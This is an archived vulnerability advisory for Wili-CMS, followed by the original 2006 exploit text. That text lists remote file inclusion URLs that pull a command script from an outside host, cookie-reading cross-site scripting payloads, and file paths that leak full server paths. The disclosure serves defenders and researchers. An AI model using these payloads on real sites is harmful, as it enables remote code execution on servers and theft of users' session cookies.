Wili-CMS Multiple Input Validation Vulnerabilities

vendor:

Wili-CMS

by:

HACKERS PAL

8,8

CVSS

HIGH

Remote include, XSS, Full Path Disclosure

79, 89, 200

CWE

Product Name: Wili-CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Wili-CMS Multiple Input Validation Vulnerabilities

Wili-CMS is vulnerable to multiple input validation vulnerabilities. These vulnerabilities include remote include, XSS, and full path disclosure. An attacker can exploit these vulnerabilities to gain access to sensitive information, execute arbitrary code, and gain access to the underlying system.

Mitigation:

The vendor has released a patch to address these vulnerabilities. It is recommended that users update to the latest version of Wili-CMS.

Source

Exploit-DB raw data:

Wili-CMS Multiple Input Validation Vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


Remote include
example-view/templates/article.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?
example-view/templates/root.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?
example-view/templates/dates_list.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?


Xss
http://localhost/vul/wili-cms/relocate.php?<script>alert(document.cookie);</script>
http://localhost/vul/wili-cms/example-view/inc/print_button.php?globals[pageid]="><script>alert(document.cookie);</script>


Full path
thumbnail.php?filename=global_variables.php
functions/admin/all.php
functions/admin/init_session.php
functions/all.php
example-view/admin_templates/ any_file.php

and many other Xss and Full path vulnerabilities
#WwW.SoQoR.NeT

# milw0rm.com [2006-09-21]